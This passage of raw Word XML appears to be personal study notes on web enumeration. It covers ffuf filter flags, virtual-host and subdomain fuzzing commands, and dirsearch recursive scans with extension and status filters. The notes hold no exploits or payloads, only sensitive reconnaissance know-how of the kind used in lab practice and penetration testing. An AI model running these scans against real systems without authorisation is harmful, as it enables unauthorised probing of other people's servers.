    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out word count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by word count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-mw 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out line count:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fl 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by line count: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ml 16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out response size: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Match by response size: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ms 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL OF THESE WORK with multiple arguments, like -fl 15,16 (no spaces)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What order to filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for status codes, as redirects (like 301) often indicate non-unique responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for response size if you see identical sizes across many responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if word or line counts show consistent patterns in default pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, one IP address may be hosting multiple sites (using virtual hosting), so like 10.10.1.1 might have multiple sites like example1.com and example2.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So in that case, when using tools like gobuster and ffuf, it's best to use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag to specify the host (ex. example3.com)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10/FUZZ -H "Host: example.com" -w directory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for URL path fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you added the host to /etc/hosts, you can just replace the hostname with the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://example.com/FUZZ -w directory.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u http://10.10.10.10 -H "Host: FUZZ.example.com" -w subdomains.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="728"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D4">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D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dw1e3xjxeas6" w:id="146"/>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirsearch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The thing about this tool is that it allows for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> recursive search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it automatically goes into subdirectories </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirsearch -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="946"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e php,txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only include specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--include-status=200,403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status codes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-status=404,302</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">response sizes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-sizes=0,88,1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
